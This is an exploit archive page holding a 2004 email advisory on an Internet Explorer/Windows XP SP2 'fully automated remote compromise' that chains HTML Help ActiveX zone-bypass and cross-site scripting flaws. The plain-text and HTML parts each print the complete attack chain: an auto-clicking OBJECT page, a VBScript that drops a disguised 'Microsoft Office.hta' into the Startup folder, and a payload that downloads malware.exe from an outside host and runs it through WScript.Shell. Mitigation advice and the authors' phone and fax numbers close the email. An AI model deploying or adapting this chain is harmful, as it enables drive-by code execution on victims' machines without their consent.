exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

MSXPSP2-ieEXP.txt

MSXPSP2-ieEXP.txt
Posted Jan 1, 2005
Authored by http-equiv, Michael Evanchik, Paul From Greyhats | Site michaelevanchik.com

Internet Explorer HTML Help Control Local Zone bypass exploit that can be used against Microsoft Windows XP versions SP2 and below.

tags | exploit, local
systems | windows
SHA-256 | f0270bd2a77960daa6990750e5a46b0c50df9742d4ff6f78a288c4f82917ef38

MSXPSP2-ieEXP.txt

Change Mirror Download
This is a multi-part message in MIME format.

------=_NextPart_000_00B2_01C4E9A9.341A2510
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: 7bit

Did they really do a good job on service pack 2? Was it worth the
investment that's reported more then the missile defense system? All these
articles on the great achievement by Microsoft and XP SP2 really merit?
They totally forgot HTA files and HTM help files. Who knows that else.



"Microsoft SP2 team, that is unacceptable, YOUR FIRED." Donald Trump









http://freehost07.websamba.com/greyhats/sp2rc-analysis.htm





Microsoft Internet Explorer XP SP2 Fully Automated Remote Compromise

Dec, 21 2004


Vulnerable
----------
- Microsoft Internet Explorer 6.0
- Microsoft Windows XP Pro SP2
- Microsoft Windows XP Home SP2


Not Tested
------------------------
- Microsoft Windows 98
- Microsoft Internet Explorer 5.x
- Microsoft Windows 2003 Server



Severity
---------
Critical - Remote code execution, no user intervention


Intro
------
Although hundreds of millions of dollars have been spent on securing SP2,
perfection is impossible. Through the joint effort of Michael Evanchik
(http://www.michaelevanchik.com) and Paul from Greyhats Security
(http://greyhats.cjb.net), a very critical vulnerability has been developed
that can compromise a user's system without the need for user interaction
besides visiting the malicious page. The vulnerability is not actually a
vulnerability in itself, but rather it is uses multiple known holes in SP2
including Help ActiveX Control Related Topics Zone Security Bypass
Vulnerability and Help ActiveX Control Related Topics Cross Site Scripting
Vulnerability.



Why Microsoft has still not patched two of these known vulnerabilities that
have been out for almost a half of year now, is beyond me.




Tech Stuff and Explanation
--------------------------

1. Create a webpage with the following code:

sp2rc.htm
---------------------------------------------------------------------
<OBJECT id="localpage" type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7%
style="position:absolute;top:140;left:72;z-index:100;"
codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1"
value="command;file://C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm">
</OBJECT>

<OBJECT id="inject" type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7%
style="position:absolute;top:140;left:72;z-index:100;"
codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1"
value='command;javascript:execScript("document.write(\"<script
language=\\\"vbscript\\\"
src=\\\"http://freehost07.websamba.com/greyhats/writehta.txt\\\"\"+String.fr
omCharCode(62)+\"</scr\"+\"ipt\"+String.fromCharCode(62))")'>
</OBJECT>

<script>
localpage.HHClick();
setTimeout("inject.HHClick()",100);
</script>
---------------------------------------------------------------------

Explanation of above code:
The first object (id: localpage) tells hhctrl.ocx to open a help popup
window to the location C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm.
This file was chosen because it is treated as the local zone and it doesn't
have any script to mess us up. On some computers an error is shown before
the popup. This is the user's only chance to prevent the vulnerability from
working. If internet explorer were to be closed at this point, the user
would be safe.

The second object (id: inject) tells the help popup to navigate to a
javascript protocol, which executes. Thus, cross site scripting has just
taken place. A script tag that uses a remote file is written to the page,
and writehta.txt (below) is executed in the unsecured local zone.

In the script, HHClick is able to be used to automate the vulnerability.
This is more effective than the previously described method of requiring a
user to click on a button.


2. Writehta.txt uses adodb recordset to write Microsoft Office.hta to the
user's startup folder. See Michael Evanchik's analysis of the drag and drop
vulnerability for an explanation on adodb recordset.

Also it is reported that a ADODB recordset can be build locally without
using a http server or ftp server like below.

writehta.txt
---------------------------------------------------------------------
Dim Conn, rs
Set Conn = CreateObject("ADODB.Connection")
Conn.Open "Driver={Microsoft Text Driver (*.txt; *.csv)};" & _
"Dbq=http://www.malware.com;" & _
"Extensions=asc,csv,tab,txt;" & _
"Persist Security Info=False"
Dim sql
sql = "SELECT * from foobar.txt"
set rs = conn.execute(sql)
set rs =CreateObject("ADODB.recordset")
rs.Open "SELECT * from foobar.txt", conn
rs.Save "C:\Documents and Settings\All Users\Start
Menu\Programs\Startup\Microsoft Office.hta", adPersistXML
rs.close
conn.close
window.close
---------------------------------------------------------------------


3. f00bar.txt (thanks malware for hosting this file) is the file requested
by the adodb recordset (again, read the drag and drop analysis at
www.michaelevanchik.com for an explanation on how this works and why the the
f00bar.txt looks like it does). Because there is absolutely no limit on what
you can do in an hta file, an old, yet effective method of requesting and
saving a file to the user's hd is used. From that, a wscript shell is
created and used to run the program. And now, ladies and gentlemen, we have
compromised the user's machine.

f00bar.txt
---------------------------------------------------------------------
"meaning less shit i had to put here"
"<script language=vbscript> crap = """
""": on error resume next: crap = """
""" : set o = CreateObject(""msxml2.XMLHTTP"") : crap="""
""" : o.open
""GET"",""http://freehost07.websamba.com/greyhats/malware.exe"",False :
crap="""
""" : o.send : crap="""
""" : set s = createobject(""adodb.stream"") : crap="""
""" : s.type=1 : crap="""
""" : s.open : crap="""
""" : s.write o.responseBody : crap="""
""" : s.savetofile ""C:\malware.exe"",2 : crap="""
""" : Set ws = CreateObject(""WScript.Shell"") : crap="""
""" : ws.Run ""C:\malware.exe"", 3, FALSE : crap="""
"""</script> crap="""
---------------------------------------------------------------------


4. Upload hhtctrl.ocx for the computers that don't happen to have this
control. All XP's seem to have this by default, some win2k3's do not
(according to Michael Evanchik)


Proof of Concept?
------------------
- http://freehost07.websamba.com/greyhats/sp2rc.htm

- If an error is shown, press OK. This is normal.

- Notice in your startup menu a new file called Microsoft Office.hta. When
run, this file will download and launch a harmless executable (which
includes a pretty neat fire animation)



Vendor Recommendations
----------------------
- Like Michael Evanchik said in his previous analysis, Microsoft needs to
apply XP Service Pack 2's local zone lockdown to .HTA files and HTML Help
(chm) files as well.

- This might be a little farfetched, but it would solve a lot of problems:
Take out the startup folder and only support running files during startup
through the registry. The startup folder is a major part of this
vulnerability and I can almost guarantee it will be used for another remote
compromise.

- Microsoft could possibly take HTA files out altogether. I have not seen
them used for anything beyond hacking.

- No vulnerability is too small or too insignificant to be taken seriously.
Treat every vulnerability as if it could be dangerous.



User Recommendations
---------------------
- Disable hta files.
- Get yourself antivirus software. I recommend Symantec because once they
get their lazy asses off the couch and fix some of this stuff you will be a
lot better off.
- Disable active scripting in Internet Explorer. If nothing else, do this.
- Do not use Internet Explorer, use Mozilla Firebird (now known as FireFox
www.mozilla.org)



Credit
------
Paul from Greyhats
Michael Evanchik
Http equiv (thanks for allowing me to use your server for f00bar.txt)


Greets
------
- Liu Die Yu (all the work you've done is amazing)


Contact
-------
paul@greyhats.cjb.net
http://greyhats.cjb.net

Note
-----
Greyhats is becoming bigger and is in need of an upgrade. If anyone is
interested in donating some webspace and a domain name I would be very
appreciative. Contact me so that we may work something out :)





Michael Evanchik

Relationship1

p: 914-921-4400

f: 914-921-6007

mailto:mevanchik@relationship1.com

web: http://www.relationship1.com






------=_NextPart_000_00B2_01C4E9A9.341A2510
Content-Type: text/html;
charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

<html xmlns:o=3D"urn:schemas-microsoft-com:office:office" =
xmlns:w=3D"urn:schemas-microsoft-com:office:word" =
xmlns:st1=3D"urn:schemas-microsoft-com:office:smarttags" =
xmlns=3D"http://www.w3.org/TR/REC-html40">

<head>
<meta http-equiv=3DContent-Type content=3D"text/html; =
charset=3Dus-ascii">
<meta name=3DGenerator content=3D"Microsoft Word 11 (filtered medium)">
<o:SmartTagType =
namespaceuri=3D"urn:schemas-microsoft-com:office:smarttags"
name=3D"State"/>
<o:SmartTagType =
namespaceuri=3D"urn:schemas-microsoft-com:office:smarttags"
name=3D"City"/>
<o:SmartTagType =
namespaceuri=3D"urn:schemas-microsoft-com:office:smarttags"
name=3D"place"/>
<!--[if !mso]>
<style>
st1\:*{behavior:url(#default#ieooui) }
</style>
<![endif]-->
<style>
<!--
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{margin:0in;
margin-bottom:.0001pt;
font-size:12.0pt;
font-family:"Times New Roman";}
a:link, span.MsoHyperlink
{color:blue;
text-decoration:underline;}
a:visited, span.MsoHyperlinkFollowed
{color:purple;
text-decoration:underline;}
p
{mso-margin-top-alt:auto;
margin-right:0in;
mso-margin-bottom-alt:auto;
margin-left:0in;
font-size:12.0pt;
font-family:"Times New Roman";}
span.EmailStyle17
{mso-style-type:personal-compose;
font-family:Arial;
color:windowtext;}
@page Section1
{size:8.5in 11.0in;
margin:1.0in 1.25in 1.0in 1.25in;}
div.Section1
{page:Section1;}
-->
</style>

</head>

<body lang=3DEN-US link=3Dblue vlink=3Dpurple>

<div class=3DSection1>

<p class=3DMsoNormal><font size=3D2 face=3DArial><span =
style=3D'font-size:10.0pt;
font-family:Arial'>Did they really do a good job on service pack =
2?&nbsp; Was
it worth the investment that’s reported more then the missile =
defense
system?&nbsp; All these articles on the great achievement by Microsoft =
&nbsp;and
XP SP2 really merit?&nbsp; They totally forgot HTA files and HTM help
files.&nbsp; Who knows that else.&nbsp; <o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D2 face=3DArial><span =
style=3D'font-size:10.0pt;
font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal><font size=3D2 face=3DArial><span =
style=3D'font-size:10.0pt;
font-family:Arial'>“Microsoft SP2 team, that is unacceptable, =
&nbsp;YOUR
FIRED.”&nbsp; Donald Trump<o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D2 face=3DArial><span =
style=3D'font-size:10.0pt;
font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal><font size=3D2 face=3DArial><span =
style=3D'font-size:10.0pt;
font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal><font size=3D2 face=3DArial><span =
style=3D'font-size:10.0pt;
font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal><font size=3D2 face=3DArial><span =
style=3D'font-size:10.0pt;
font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal><font size=3D2 face=3DArial><span =
style=3D'font-size:10.0pt;
font-family:Arial'><a
href=3D"http://freehost07.websamba.com/greyhats/sp2rc-analysis.htm">http:=
//freehost07.websamba.com/greyhats/sp2rc-analysis.htm</a><o:p></o:p></spa=
n></font></p>

<p class=3DMsoNormal><font size=3D2 face=3DArial><span =
style=3D'font-size:10.0pt;
font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal><font size=3D2 face=3DArial><span =
style=3D'font-size:10.0pt;
font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>

<p><font size=3D3 face=3D"Times New Roman"><span =
style=3D'font-size:12.0pt'>Microsoft
Internet Explorer XP SP2 Fully Automated Remote =
Compromise<o:p></o:p></span></font></p>

<p><font size=3D3 face=3D"Times New Roman"><span =
style=3D'font-size:12.0pt'>Dec, 21
2004<o:p></o:p></span></font></p>

<p><font size=3D3 face=3D"Times New Roman"><span =
style=3D'font-size:12.0pt'><br>
Vulnerable<br>
----------<br>
- Microsoft Internet Explorer 6.0<br>
- Microsoft Windows XP Pro SP2<br>
- Microsoft Windows XP Home SP2<o:p></o:p></span></font></p>

<p><font size=3D3 face=3D"Times New Roman"><span =
style=3D'font-size:12.0pt'><br>
Not Tested<br>
------------------------<br>
- Microsoft Windows 98<br>
- Microsoft Internet Explorer 5.x<br>
- Microsoft Windows 2003 Server<o:p></o:p></span></font></p>

<p><font size=3D3 face=3D"Times New Roman"><span =
style=3D'font-size:12.0pt'>&nbsp;<o:p></o:p></span></font></p>

<p><font size=3D3 face=3D"Times New Roman"><span =
style=3D'font-size:12.0pt'>Severity<br>
---------<br>
Critical - Remote code execution, no user =
intervention<o:p></o:p></span></font></p>

<p><font size=3D3 face=3D"Times New Roman"><span =
style=3D'font-size:12.0pt'><br>
Intro<br>
------<br>
Although hundreds of millions of dollars have been spent on securing =
SP2,
perfection is impossible. Through the joint effort of Michael Evanchik =
(<a
href=3D"http://www.michaelevanchik.com">http://www.michaelevanchik.com</a=
>) and
Paul from Greyhats Security (<a =
href=3D"http://greyhats.cjb.net">http://greyhats.cjb.net</a>),
a very critical vulnerability has been developed that can compromise a =
user's
system without the need for user interaction besides visiting the =
malicious
page. The vulnerability is not actually a vulnerability in itself, but =
rather
it is uses multiple known holes in SP2 including Help ActiveX Control =
Related
Topics Zone Security Bypass Vulnerability and Help ActiveX Control =
Related
Topics Cross Site Scripting Vulnerability. <o:p></o:p></span></font></p>

<p><font size=3D3 face=3D"Times New Roman"><span =
style=3D'font-size:12.0pt'><o:p>&nbsp;</o:p></span></font></p>

<p><font size=3D3 face=3D"Times New Roman"><span =
style=3D'font-size:12.0pt'>Why
Microsoft has still not patched two of these known vulnerabilities that =
have
been out for almost a half of year now, is beyond =
me.<o:p></o:p></span></font></p>

<p><font size=3D3 face=3D"Times New Roman"><span =
style=3D'font-size:12.0pt'><o:p>&nbsp;</o:p></span></font></p>

<p><font size=3D3 face=3D"Times New Roman"><span =
style=3D'font-size:12.0pt'><br>
Tech Stuff and Explanation<br>
--------------------------<o:p></o:p></span></font></p>

<p><font size=3D3 face=3D"Times New Roman"><span =
style=3D'font-size:12.0pt'>1. Create
a webpage with the following code:<o:p></o:p></span></font></p>

<p><font size=3D3 face=3D"Times New Roman"><span =
style=3D'font-size:12.0pt'>sp2rc.htm<br>
---------------------------------------------------------------------<br>=

<OBJECT id=3D"localpage" =
type=3D"application/x-oleobject"
classid=3D"clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" =
height=3D7%<br>
style=3D"position:absolute;top:140;left:72;z-index:100;"
codebase=3D"hhctrl.ocx#Version=3D5,2,3790,1194" =
width=3D"7%"><br>
<PARAM name=3D"Command" value=3D"Related Topics, =
MENU"><br>
<PARAM name=3D"Button" value=3D"Text:Just a =
button"><br>
<PARAM name=3D"Window" =
value=3D"$global_blank"><br>
<PARAM name=3D"Item1" =
value=3D"command;file://C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\to=
ols.htm"><br>
</OBJECT><o:p></o:p></span></font></p>

<p><font size=3D3 face=3D"Times New Roman"><span =
style=3D'font-size:12.0pt'><OBJECT
id=3D"inject" type=3D"application/x-oleobject"
classid=3D"clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" =
height=3D7%<br>
style=3D"position:absolute;top:140;left:72;z-index:100;" =
codebase=3D"hhctrl.ocx#Version=3D5,2,3790,1194"
width=3D"7%"><br>
<PARAM name=3D"Command" value=3D"Related Topics, =
MENU"><br>
<PARAM name=3D"Button" value=3D"Text:Just a =
button"><br>
<PARAM name=3D"Window" =
value=3D"$global_blank"><br>
<PARAM name=3D"Item1"
value=3D'command;javascript:execScript("document.write(\"<sc=
ript
language=3D\\\"vbscript\\\"
src=3D\\\"http://freehost07.websamba.com/greyhats/writehta.txt\\\&qu=
ot;\"+String.fromCharCode(62)+\"</scr\"+\"ipt\&quo=
t;+String.fromCharCode(62))")'><br>
</OBJECT><o:p></o:p></span></font></p>

<p><font size=3D3 face=3D"Times New Roman"><span =
style=3D'font-size:12.0pt'><script><br>
localpage.HHClick();<br>
setTimeout("inject.HHClick()",100);<br>
</script><br>
---------------------------------------------------------------------<o:p=
></o:p></span></font></p>

<p><font size=3D3 face=3D"Times New Roman"><span =
style=3D'font-size:12.0pt'>Explanation
of above code:<br>
The first object (id: localpage) tells hhctrl.ocx to open a help popup =
window
to the location C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm. =
This file
was chosen because it is treated as the local zone and it doesn't have =
any
script to mess us up. On some computers an error is shown before the =
popup.
This is the user's only chance to prevent the vulnerability from =
working. If
internet explorer were to be closed at this point, the user would be =
safe.<o:p></o:p></span></font></p>

<p><font size=3D3 face=3D"Times New Roman"><span =
style=3D'font-size:12.0pt'>The
second object (id: inject) tells the help popup to navigate to a =
javascript
protocol, which executes. Thus, cross site scripting has just taken =
place. A
script tag that uses a remote file is written to the page, and =
writehta.txt
(below) is executed in the unsecured local =
zone.<o:p></o:p></span></font></p>

<p><font size=3D3 face=3D"Times New Roman"><span =
style=3D'font-size:12.0pt'>In the
script, HHClick is able to be used to automate the vulnerability. This =
is more
effective than the previously described method of requiring a user to =
click on
a button.<o:p></o:p></span></font></p>

<p><font size=3D3 face=3D"Times New Roman"><span =
style=3D'font-size:12.0pt'><br>
2. Writehta.txt uses adodb recordset to write Microsoft Office.hta to =
the
user's startup folder. See Michael Evanchik's analysis of the drag and =
drop
vulnerability for an explanation on adodb =
recordset.<o:p></o:p></span></font></p>

<p><font size=3D3 face=3D"Times New Roman"><span =
style=3D'font-size:12.0pt'>Also it
is reported that a ADODB recordset can be build locally without using a =
http
server or ftp server like below.<o:p></o:p></span></font></p>

<p><font size=3D3 face=3D"Times New Roman"><span =
style=3D'font-size:12.0pt'>writehta.txt<br>
---------------------------------------------------------------------<br>=

<nobr>Dim <st1:place w:st=3D"on"><st1:State =
w:st=3D"on">Conn</st1:State></st1:place>,
rs<br>
<st1:place w:st=3D"on"><st1:City w:st=3D"on">Set</st1:City> <st1:State =
w:st=3D"on">Conn</st1:State></st1:place>
=3D CreateObject("ADODB.Connection")<br>
Conn.Open "Driver=3D{Microsoft Text Driver (*.txt; *.csv)};" =
& _<br>
"Dbq=3Dhttp://www.malware.com;" & _<br>
"Extensions=3Dasc,csv,tab,txt;" & _<br>
"Persist Security Info=3DFalse"<br>
Dim sql<br>
sql =3D "SELECT * from foobar.txt"<br>
set rs =3D conn.execute(sql)<br>
set rs =3DCreateObject("ADODB.recordset")<br>
rs.Open "SELECT * from foobar.txt", conn<br>
rs.Save "C:\Documents and Settings\All Users\Start
Menu\Programs\Startup\Microsoft Office.hta", adPersistXML<br>
rs.close<br>
conn.close<br>
window.close</nobr><br>
---------------------------------------------------------------------<o:p=
></o:p></span></font></p>

<p><font size=3D3 face=3D"Times New Roman"><span =
style=3D'font-size:12.0pt'><br>
3. f00bar.txt (thanks malware for hosting this file) is the file =
requested by
the adodb recordset (again, read the drag and drop analysis at <a
href=3D"http://www.michaelevanchik.com">www.michaelevanchik.com</a> for =
an
explanation on how this works and why the the f00bar.txt looks like it =
does).
Because there is absolutely no limit on what you can do in an hta file, =
an old,
yet effective method of requesting and saving a file to the user's hd is =
used.
>>From that, a wscript shell is created and used to run the program. And =
now,
ladies and gentlemen, we have compromised the user's =
machine.<o:p></o:p></span></font></p>

<p><font size=3D3 face=3D"Times New Roman"><span =
style=3D'font-size:12.0pt'>f00bar.txt<br>
---------------------------------------------------------------------<br>=

"meaning less shit i had to put here"<br>
"<script language=3Dvbscript> crap =3D """<br>
""": on error resume next: crap =3D =
"""<br>
""" : set o =3D
CreateObject(""msxml2.XMLHTTP"") : =
crap=3D"""<br>
""" : o.open
""GET"",""http://freehost07.websamba.com/gr=
eyhats/malware.exe"",False
: crap=3D"""<br>
""" : o.send : crap=3D"""<br>
""" : set s =3D =
createobject(""adodb.stream"")
: crap=3D"""<br>
""" : s.type=3D1 : crap=3D"""<br>
""" : s.open : crap=3D"""<br>
""" : s.write o.responseBody : =
crap=3D"""<br>
""" : s.savetofile =
""C:\malware.exe"",2 :
crap=3D"""<br>
""" : Set ws =3D
CreateObject(""WScript.Shell"") : =
crap=3D"""<br>
""" : ws.Run ""C:\malware.exe"", 3, =
FALSE :
crap=3D"""<br>
"""</script> crap=3D"""<br>
---------------------------------------------------------------------<o:p=
></o:p></span></font></p>

<p><font size=3D3 face=3D"Times New Roman"><span =
style=3D'font-size:12.0pt'><br>
4.&nbsp; Upload hhtctrl.ocx for the computers that don’t happen to =
have
this control.&nbsp; All XP's seem to have this by default, some win2k3's =
do not
(according to Michael Evanchik)<o:p></o:p></span></font></p>

<p><font size=3D3 face=3D"Times New Roman"><span =
style=3D'font-size:12.0pt'><br>
Proof of Concept?<br>
------------------<br>
- <a =
href=3D"http://freehost07.websamba.com/greyhats/sp2rc.htm">http://freehos=
t07.websamba.com/greyhats/sp2rc.htm</a><o:p></o:p></span></font></p>

<p><font size=3D3 face=3D"Times New Roman"><span =
style=3D'font-size:12.0pt'>- If an
error is shown, press OK. This is normal.<o:p></o:p></span></font></p>

<p><font size=3D3 face=3D"Times New Roman"><span =
style=3D'font-size:12.0pt'>- Notice
in your startup menu a new file called Microsoft Office.hta. When run, =
this
file will download and launch a harmless executable (which includes a =
pretty
neat fire animation) <o:p></o:p></span></font></p>

<p><font size=3D3 face=3D"Times New Roman"><span =
style=3D'font-size:12.0pt'>&nbsp;<o:p></o:p></span></font></p>

<p><font size=3D3 face=3D"Times New Roman"><span =
style=3D'font-size:12.0pt'>Vendor
Recommendations<br>
----------------------<br>
- Like Michael Evanchik said in his previous analysis, Microsoft needs =
to apply
XP Service Pack 2's local zone lockdown to .HTA files and HTML Help =
(chm) files
as well.<o:p></o:p></span></font></p>

<p><font size=3D3 face=3D"Times New Roman"><span =
style=3D'font-size:12.0pt'>- This
might be a little farfetched, but it would solve a lot of problems: Take =
out
the startup folder and only support running files during startup through =
the
registry. The startup folder is a major part of this vulnerability and I =
can
almost guarantee it will be used for another remote =
compromise.<o:p></o:p></span></font></p>

<p><font size=3D3 face=3D"Times New Roman"><span =
style=3D'font-size:12.0pt'>-
Microsoft could possibly take HTA files out altogether. I have not seen =
them
used for anything beyond hacking.<o:p></o:p></span></font></p>

<p><font size=3D3 face=3D"Times New Roman"><span =
style=3D'font-size:12.0pt'>- No
vulnerability is too small or too insignificant to be taken seriously. =
Treat
every vulnerability as if it could be dangerous. =
<o:p></o:p></span></font></p>

<p><font size=3D3 face=3D"Times New Roman"><span =
style=3D'font-size:12.0pt'>&nbsp;<o:p></o:p></span></font></p>

<p><font size=3D3 face=3D"Times New Roman"><span =
style=3D'font-size:12.0pt'>User Recommendations<br>
---------------------<br>
- Disable hta files.<br>
- Get yourself antivirus software. I recommend Symantec because once =
they get
their lazy asses off the couch and fix some of this stuff you will be a =
lot
better off.<br>
- Disable active scripting in Internet Explorer. If nothing else, do =
this.<br>
- Do not use Internet Explorer, use Mozilla Firebird (now known as
FireFox&nbsp; <a =
href=3D"http://www.mozilla.org">www.mozilla.org</a>)<o:p></o:p></span></f=
ont></p>

<p><font size=3D3 face=3D"Times New Roman"><span =
style=3D'font-size:12.0pt'>&nbsp;<o:p></o:p></span></font></p>

<p><font size=3D3 face=3D"Times New Roman"><span =
style=3D'font-size:12.0pt'>Credit<br>
------<br>
Paul from Greyhats<br>
Michael Evanchik<br>
Http equiv (thanks for allowing me to use your server for =
f00bar.txt)<o:p></o:p></span></font></p>

<p><font size=3D3 face=3D"Times New Roman"><span =
style=3D'font-size:12.0pt'><br>
Greets<br>
------<br>
- Liu Die Yu (all the work you've done is =
amazing)<o:p></o:p></span></font></p>

<p><font size=3D3 face=3D"Times New Roman"><span =
style=3D'font-size:12.0pt'><br>
Contact<br>
-------<br>
<a href=3D"mailto:paul@greyhats.cjb.net">paul@greyhats.cjb.net</a><br>
<a =
href=3D"http://greyhats.cjb.net">http://greyhats.cjb.net</a><o:p></o:p></=
span></font></p>

<p><font size=3D3 face=3D"Times New Roman"><span =
style=3D'font-size:12.0pt'>Note<br>
-----<br>
Greyhats is becoming bigger and is in need of an upgrade. If anyone is
interested in donating some webspace and a domain name I would be very
appreciative. Contact me so that we may work something out =
:)<o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D2 face=3DArial><span =
style=3D'font-size:10.0pt;
font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal><font size=3D2 face=3DArial><span =
style=3D'font-size:10.0pt;
font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal><font size=3D2 face=3DArial><span =
style=3D'font-size:10.0pt;
font-family:Arial'>Michael Evanchik</span></font><o:p></o:p></p>

<p class=3DMsoNormal><font size=3D2 face=3DArial><span =
style=3D'font-size:10.0pt;
font-family:Arial'>Relationship1</span></font><o:p></o:p></p>

<p class=3DMsoNormal><font size=3D2 face=3DArial><span =
style=3D'font-size:10.0pt;
font-family:Arial'>p: 914-921-4400</span></font><o:p></o:p></p>

<p class=3DMsoNormal><font size=3D2 face=3DArial><span =
style=3D'font-size:10.0pt;
font-family:Arial'>f:&nbsp; 914-921-6007</span></font><o:p></o:p></p>

<p class=3DMsoNormal><font size=3D2 face=3DArial><span =
style=3D'font-size:10.0pt;
font-family:Arial'><a =
href=3D"mailto:mevanchik@relationship1.com">mailto:mevanchik@relationship=
1.com</a></span></font><o:p></o:p></p>

<p class=3DMsoNormal><font size=3D2 face=3DArial><span =
style=3D'font-size:10.0pt;
font-family:Arial'>web: <a =
href=3D"http://www.relationship1.com">http://www.relationship1.com</a></s=
pan></font><o:p></o:p></p>

<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
style=3D'font-size:
12.0pt'>&nbsp;</span><o:p></o:p></font></p>

<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
style=3D'font-size:
12.0pt'><o:p>&nbsp;</o:p></span></font></p>

</div>

</body>

</html>

------=_NextPart_000_00B2_01C4E9A9.341A2510--

Login or Register to add favorites

File Archive:

November 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    16 Files
  • 2
    Nov 2nd
    17 Files
  • 3
    Nov 3rd
    17 Files
  • 4
    Nov 4th
    11 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    3 Files
  • 8
    Nov 8th
    59 Files
  • 9
    Nov 9th
    12 Files
  • 10
    Nov 10th
    6 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    1 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    9 Files
  • 15
    Nov 15th
    33 Files
  • 16
    Nov 16th
    53 Files
  • 17
    Nov 17th
    11 Files
  • 18
    Nov 18th
    14 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    26 Files
  • 22
    Nov 22nd
    22 Files
  • 23
    Nov 23rd
    10 Files
  • 24
    Nov 24th
    9 Files
  • 25
    Nov 25th
    11 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    20 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close